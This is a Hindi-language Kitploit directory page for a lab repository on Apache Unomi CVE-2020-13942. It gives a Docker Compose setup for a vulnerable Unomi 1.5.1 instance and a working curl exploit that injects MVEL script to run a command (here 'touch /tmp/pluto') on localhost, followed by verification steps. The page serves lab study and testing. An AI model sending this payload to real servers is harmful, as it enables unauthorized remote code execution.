Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-13942byVulHub — Apache Unomi CVE-2020-13942 के लिए चरण-दर-चरण प्रयोगशाला वातावरण और शोषण, जो MVEL अभिव्यक्ति भाषा इंजेक्शन के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

Apache Unomi CVE-2020-13942 के लिए चरण-दर-चरण प्रयोगशाला वातावरण और शोषण, जो MVEL अभिव्यक्ति भाषा इंजेक्शन के माध्यम से रिमोट कोड निष्पादन का प्रदर्शन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2020-13942byVulHub


Apache Unomi Expression Language Injection RCE (CVE-2020-13942)

विवरण

यह भेद्यता MVEL अभिव्यक्ति भाषा इंजेक्शन का शोषण करके Apache Unomi संस्करण 1.5.1 चलाने वाले सिस्टम पर मनमाने कमांड के निष्पादन की अनुमति देती है।

परियोजना पृष्ठ

GitHub - Vulhub - Unomi CVE-2020-13942


पर्यावरण कॉन्फ़िगरेशन

Docker Compose फ़ाइल (docker-compose.yml)

root@kitploit:~
version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

कंटेनर प्रारंभ करना

निम्नलिखित कमांड के साथ कंटेनर चलाएँ:

root@kitploit:~
docker compose up -d

एक्सप्लॉइट का निष्पादन

Kali से चलाने का कमांड

curl का उपयोग करके निम्नलिखित POST अनुरोध भेजें:

root@kitploit:~
curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

एक्सप्लॉइट का सत्यापन

कंटेनर तक पहुँच

फ़ाइल निर्माण की पुष्टि करने के लिए कंटेनर में प्रवेश करें:

root@kitploit:~
docker exec -it af7de05fc47e ls /tmp

परिणाम की जाँच

pluto फ़ोल्डर की उपस्थिति की जाँच करें:

root@kitploit:~
hsperfdata_root  pluto

यदि pluto फ़ाइल मौजूद है, तो इसका मतलब है कि एक्सप्लॉइट सफल हुआ।


सुरक्षा नोट्स

यह भेद्यता मनमाने कमांड के निष्पादन की अनुमति देती है। इन परीक्षणों का उपयोग केवल नियंत्रित वातावरण में और अध्ययन या सत्यापन उद्देश्यों के लिए करें। अनधिकृत वातावरण में भेद्यताओं का शोषण करना अवैध है।

टूल डाउनलोड करें